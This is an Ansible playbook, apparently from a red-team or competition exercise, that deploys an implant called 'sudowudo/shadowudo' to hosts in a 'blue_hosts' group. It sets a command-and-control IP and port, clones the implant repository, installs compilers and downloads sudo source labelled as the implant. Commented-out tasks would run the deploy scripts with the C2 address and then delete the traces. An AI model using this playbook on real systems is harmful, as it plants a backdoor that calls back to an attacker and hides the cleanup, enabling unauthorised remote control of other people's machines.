---
# Deploy sudowudo/shadowudo on remote hosts
- name: Deploy sudowudo/shadowudo
  hosts: blue_hosts
  remote_user: ubuntu
  vars:
    c2_ip: "10.0.1.242"
    c2_port: 4242
    sudo_version: "SUDO_1_9_14p3"
  become: yes
  tasks:
    - name: Clone repo
      git:
        repo: https://github.com/vaughnw128/sudowudo.git
        dest: /tmp/sudowudo
        clone: yes
        update: yes

    - name: Install packages
      apt: update_cache=yes name={{ item }} state=present
      with_items:
        - gcc
        - make
        - cmake

    - name: download implant
      ansible.builtin.get_url:
        url: "https://codeload.github.com/sudo-project/sudo/zip/refs/tags/{{ sudo_version }}"
        dest: "/tmp/sudowudo/sudo"
        mode: '0777'
        owner: root

    # - name: Deploy sudowudo
    #   command: sh /tmp/sudowudo/deploy-sudowudo {{ c2_ip }} {{ c2_port }}

    # - name: Deploy shadowudo
    #   command: sh /tmp/sudowudo/deploy-shadowudo {{ c2_ip }} {{ c2_port }}

    # - name: Delete content & directory
    #   ansible.builtin.file:
    #     state: absent
    #     path: '/tmp/sudowudo'

